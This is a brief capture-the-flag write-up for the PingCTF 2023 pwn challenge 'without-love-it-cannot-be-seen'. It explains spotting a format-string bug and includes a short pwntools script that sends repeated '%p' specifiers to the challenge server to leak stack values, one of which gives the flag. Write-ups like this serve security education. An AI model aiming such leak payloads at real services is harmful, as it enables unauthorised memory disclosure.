Pingctf 2023: pwn chall: without-love-it-cannot-be-seen

# Pingctf 2023: pwn chall: without-love-it-cannot-be-seen ## Overview We are given a netcat link ``` nc without-love-it-cannot-be-seen.knping.pl 30001 ``` Tested it, we find that the program requires us to input a string then it automatically output what we just said. The program seems also to compare our input string to some other strings. ![image](https://hackmd.io/_uploads/Sk3N56BLp.png) ## Solve Clearly, it is an format string vulnerability. So i test it with multiple %p to see if there is anything we can use. ![image](https://hackmd.io/_uploads/ByztqTB8T.png) ![image](https://hackmd.io/_uploads/S1l5cTrIp.png) ![image](https://hackmd.io/_uploads/S1QocTrL6.png) So doing manually took a lot of time so i create a simple python script to send "%p" multiple times. ## Script ``` from pwn import * p = remote("without-love-it-cannot-be-seen.knping.pl", 30001) format_string = b"" for i in range(20): format_string += b"%p," print(format_string) p.sendline(format_string) p.interactive() ``` Running it and we got results: ![image](https://hackmd.io/_uploads/BJAfiTHUa.png) There is one output that seems weird: 0x7866deafdeaf6687 So i try to use it and got the flag. ![image](https://hackmd.io/_uploads/H10Uj6SUa.png)